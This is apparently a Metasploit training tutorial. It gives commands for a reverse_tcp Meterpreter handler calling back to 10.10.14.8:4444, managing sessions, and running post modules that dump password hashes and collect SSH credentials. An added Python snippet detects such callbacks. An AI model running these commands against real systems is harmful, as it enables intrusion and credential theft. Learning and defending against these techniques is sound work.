After identifying a vulnerable service, exploitation involves using an exploit module to gain control of the target system. Once access is gained (usually via a payload), post-exploitation begins — where the attacker explores the system, gathers data, and tries to maintain access.
Exploitation Workflow
You start by selecting an exploit and pairing it with a suitable payload. This often involves setting options like target IP, port, and local host for the callback connection.
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.8
set LPORT 4444
run
Alternatively, use:
exploit
Both run and exploit work, but exploit is more common and readable.
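As an added example that is not from the original page, here is the defender's view of the callback described above: a small Python check over constructed connection records that flags long-lived outbound TCP connections to unexpected ports, the shape a reverse_tcp payload produces when it connects back to multi/handler on LPORT 4444. The sample records, monitored network range, port allowlist and duration threshold are all assumptions.

```python
import ipaddress
from dataclasses import dataclass

# Constructed sample connection records (not from the original page), one per line:
# timestamp, source IP, destination IP, destination port, protocol, duration in seconds.
SAMPLE_CONN_LOG = """\
1700000001.0 10.10.10.5 10.10.10.20 443 tcp 0.4
1700000002.0 10.10.10.5 10.10.14.8 4444 tcp 1820.3
1700000004.0 10.10.10.5 10.10.14.8 80 tcp 2.0
1700000005.0 10.10.10.9 10.10.14.8 4444 tcp 0.2
"""

# Assumed policy values: ports that normally carry outbound traffic, and how long a
# connection must stay open before it looks like an interactive channel.
EXPECTED_OUTBOUND_PORTS = {22, 53, 80, 443}
LONG_LIVED_SECONDS = 600.0

@dataclass
class Conn:
    ts: float
    src: str
    dst: str
    dport: int
    proto: str
    duration: float

def parse_conn_log(text: str) -> list[Conn]:
    """Parse the whitespace-separated records, skipping blank and comment lines."""
    conns = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, src, dst, dport, proto, dur = line.split()
        conns.append(Conn(float(ts), src, dst, int(dport), proto, float(dur)))
    return conns

def find_reverse_shell_candidates(conns: list[Conn], monitored_nets: list[str]) -> list[Conn]:
    """Return TCP connections that leave the monitored networks for an unexpected port
    and stay open a long time. A reverse_tcp payload calling back to multi/handler on
    LPORT 4444 fits this shape; so can legitimate software, so each hit is a lead
    to investigate, not a verdict."""
    nets = [ipaddress.ip_network(n) for n in monitored_nets]
    inside = lambda ip: any(ipaddress.ip_address(ip) in n for n in nets)
    return [
        c for c in conns
        if c.proto == "tcp" and inside(c.src) and not inside(c.dst)
        and c.dport not in EXPECTED_OUTBOUND_PORTS
        and c.duration >= LONG_LIVED_SECONDS
    ]
```

The short connection to port 4444 from 10.10.10.9 is deliberately not flagged, so a failed or brief callback needs a different signal (for example repeated attempts) than the one this check looks for.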
Useful Commands in Exploitation
- show exploits — List available exploit modules
- show payloads — View compatible payloads for the chosen exploit
- set payload <payload> — Set the desired payload
- show options — View required settings before launching
- info — See detailed information about the selected module
Session Management
After a successful exploit, a session is created — often a Meterpreter or regular shell session.
sessions # List all current sessions
sessions -i 1 # Interact with session 1
background # Background an active session
Post-exploitation modules generally need an active session to run against.
Post-Exploitation Overview
Once you have a session, post-exploitation lets you:
- Enumerate the system and environment
- Extract credentials or sensitive data
- Escalate privileges
- Maintain access or pivot to other systems
You use post modules such as the ones under:
post/linux/gather/
post/linux/manage/
post/multi/gather/
Running a Post Module
Steps to run a post-exploitation module:
use post/linux/gather/hashdump
set SESSION 1
run
You must set a valid SESSION. Check current ones with:
sessions
To get full module info and requirements:
info
show options
Example Modules
These modules are commonly used after exploitation:
- post/linux/gather/hashdump — Dump password hashes
- post/linux/manage/printenv — Show environment variables
- post/linux/gather/checkvm — Detect virtual machines
- post/multi/gather/ssh_creds — Search for SSH keys or configs
Search them by type or platform:
search type:post platform:linux
search gather